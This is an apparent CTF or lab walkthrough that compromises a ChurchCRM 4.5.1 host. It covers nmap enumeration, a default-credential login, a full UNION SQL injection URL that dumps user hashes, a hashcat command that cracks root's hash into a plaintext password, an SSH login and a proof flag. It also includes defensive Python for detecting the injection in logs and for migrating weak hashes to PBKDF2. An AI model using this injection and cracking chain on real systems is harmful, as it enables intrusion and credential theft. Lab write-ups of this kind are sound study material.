Enum
sudo nmap -T4 -A -v -o nmap --min-rate 1000 $IP
sudo nmap -T4 --script=vuln -v -o vuln --min-rate 1000 $IP
sudo nmap -T4 -A -v -p- -o alltcp --min-rate 1000 $IP
sudo nmap -T4 -sU -sV -sC -v -p- -o udp --min-rate 1000 $IP
sudo nmap -A -v -p- -o alltcpslow $IP
Services:
Discovered open port 22/tcp on 192.168.245.44
Discovered open port 80/tcp on 192.168.245.44
80:
Default creds work:
Admin:changeme
ChurchCRM 4.5.1 - Authenticated SQL Injection (php/webapps/51319.py)
Before doing this, let's see if we can just upload a PHP shell with our access.
Could not find a spot, let's try this:
➜ groove python3 51319.py http://192.168.245.44 Admin changeme
Did not work, but examining the exploit manually we can just use the URL directly:
http://192.168.245.44/EventAttendance.php?Action=List&Event=2+UNION+ALL+SELECT+1,NULL,CONCAT(%27Perseverance%27,usr_Username,%27:%27,usr_Password),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL+from+user_usr--+-&Type=Sunday%20School
Dump hashes
Admin:4bdf3fba58c956fc3991a1fde84929223f968e2853de596e49ae80a91499609b
root:33b8fc76a24681b67a9431b632548d069336202bed5828fe431711a8e5b52d1b
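The injection above travels in a single GET query parameter, so it leaves a clear trace in the web server's access log. The Python below is an added example (it is not part of this write-up or of ChurchCRM) that parses combined-format log lines, URL-decodes every query parameter (including the `+`-for-space and `%27` encodings seen in the request above, and double-encoded variants), and flags UNION/SELECT shapes per source IP. The log lines are constructed: one is shaped like the request above, one is a shorter probe, the rest are benign traffic against the same application.

```python
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Constructed sample access-log lines (Apache/nginx combined format).
# Lines 3 and 4 carry UNION-style payloads in the Event parameter; lines 1 and 2 are benign.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Jan/2024:10:00:01 +0000] "GET /EventAttendance.php?Action=List&Event=2&Type=Sunday%20School HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.5 - - [10/Jan/2024:10:00:07 +0000] "GET /PersonView.php?PersonID=7 HTTP/1.1" 200 8801 "-" "Mozilla/5.0"
10.0.0.9 - - [10/Jan/2024:10:02:13 +0000] "GET /EventAttendance.php?Action=List&Event=2+UNION+ALL+SELECT+1,NULL,CONCAT(%27x%27,usr_Username,%27:%27,usr_Password),NULL+from+user_usr--+-&Type=Sunday%20School HTTP/1.1" 200 5300 "-" "python-requests/2.31"
10.0.0.9 - - [10/Jan/2024:10:02:20 +0000] "GET /EventAttendance.php?Action=List&Event=2%20UNION%20SELECT%20NULL HTTP/1.1" 200 5290 "-" "python-requests/2.31"
"""

# Combined log format: ip ident user [timestamp] "METHOD target PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

# Patterns evaluated against fully decoded parameter values, not the raw URL.
SQLI_PATTERNS = [
    re.compile(r"\bunion\b\s+(all\s+)?select\b", re.I),   # UNION [ALL] SELECT
    re.compile(r"\bfrom\s+\w+\s*--", re.I),                # ... from <table>--
    re.compile(r"\bconcat\s*\(", re.I),                    # CONCAT( used to stitch columns
]


def parse_line(line):
    """Split one log line into its fields plus the decoded query parameters."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec["target"])
    rec["path"] = parts.path
    # parse_qsl performs one round of %XX and '+' decoding per value.
    rec["params"] = parse_qsl(parts.query, keep_blank_values=True)
    return rec


def fully_decode(value, rounds=3):
    """Decode repeatedly until stable so double-encoded payloads (%2527 -> %27 -> ') are caught.
    A literal '+' in a benign value also becomes a space; acceptable for detection purposes."""
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def find_sqli(log_text):
    """Return (ip, path, parameter, pattern) for every request carrying an injection shape."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        for name, value in rec["params"]:
            decoded = fully_decode(value)
            for pat in SQLI_PATTERNS:
                if pat.search(decoded):
                    hits.append((rec["ip"], rec["path"], name, pat.pattern))
                    break  # one hit per parameter is enough
    return hits


def summarize(hits):
    """Count suspicious requests per source IP, the figure an alert would key on."""
    counts = {}
    for ip, _path, _param, _pat in hits:
        counts[ip] = counts.get(ip, 0) + 1
    return counts


if __name__ == "__main__":
    found = find_sqli(SAMPLE_LOG)
    for ip, path, param, pat in found:
        print(f"{ip} {path} param={param} matched={pat}")
    print(summarize(found))
```

Matching on decoded parameter values rather than the raw request line is the important design choice: the same payload can be written with `+`, `%20`, or `%2520` for a space, and a raw-string signature would miss two of the three.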
This GitHub issue:
explains that the hash's salt is the user ID.
root is ID 2.
hashcat -m 1410 -a 0 33b8fc76a24681b67a9431b632548d069336202bed5828fe431711a8e5b52d1b:2 /usr/share/wordlists/rockyou.txt
artistakeichelleko2007
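Why the cracking step is cheap, and what the fix looks like: hashcat mode 1410 is sha256($pass.$salt), and with the user ID as the salt the scheme is one fast digest over a guessable suffix. The Python below is an added example, not ChurchCRM's code, that reproduces that legacy construction only so a login routine can still recognise existing records, puts a PBKDF2-HMAC-SHA256 record with a random 16-byte salt beside it, and migrates a user to the stronger record the next time they log in successfully. The function names, the record format and the iteration count are my own choices.

```python
import hashlib
import hmac
import os
from typing import Optional, Tuple

# Legacy scheme as described above: SHA-256 over password + numeric user ID.
# The salt is predictable and the digest is fast, so wordlist cracking is cheap.
def legacy_hash(password: str, user_id: int) -> str:
    return hashlib.sha256((password + str(user_id)).encode()).hexdigest()


# Hardened scheme (illustrative): PBKDF2-HMAC-SHA256, random salt, high iteration count,
# stored as a self-describing record so parameters can be raised later without breaking logins.
PBKDF2_ITERATIONS = 600_000


def pbkdf2_hash(password: str, salt: Optional[bytes] = None,
                iterations: int = PBKDF2_ITERATIONS) -> str:
    salt = salt if salt is not None else os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations, dklen=32)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${dk.hex()}"


def pbkdf2_verify(password: str, stored: str) -> bool:
    try:
        algo, iters, salt_hex, dk_hex = stored.split("$")
    except ValueError:
        return False
    if algo != "pbkdf2_sha256":
        return False
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(),
                                    bytes.fromhex(salt_hex), int(iters), dklen=32)
    # Constant-time comparison avoids leaking how many leading bytes matched.
    return hmac.compare_digest(candidate, bytes.fromhex(dk_hex))


def verify_and_migrate(password: str, user_id: int, stored: str) -> Tuple[bool, Optional[str]]:
    """Check a login against either record format.
    Returns (ok, new_record): new_record is a PBKDF2 record when a legacy hash matched,
    so the caller can overwrite the stored value and retire the weak format user by user."""
    if stored.startswith("pbkdf2_sha256$"):
        return pbkdf2_verify(password, stored), None
    if hmac.compare_digest(legacy_hash(password, user_id), stored):
        return True, pbkdf2_hash(password)
    return False, None


if __name__ == "__main__":
    # Constructed demo user: legacy record first, then migrated on login.
    old = legacy_hash("example-password", 2)
    ok, new_record = verify_and_migrate("example-password", 2, old)
    print("legacy login ok:", ok)
    print("migrated record:", new_record)
    print("re-login ok:", verify_and_migrate("example-password", 2, new_record)[0])
```

The migration needs the cleartext, which is only available at login time; records that never log in again stay weak and should be force-reset after a deadline.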
SSH in.
proof
c0f9e77a0572f4853aae5e64f6c19d51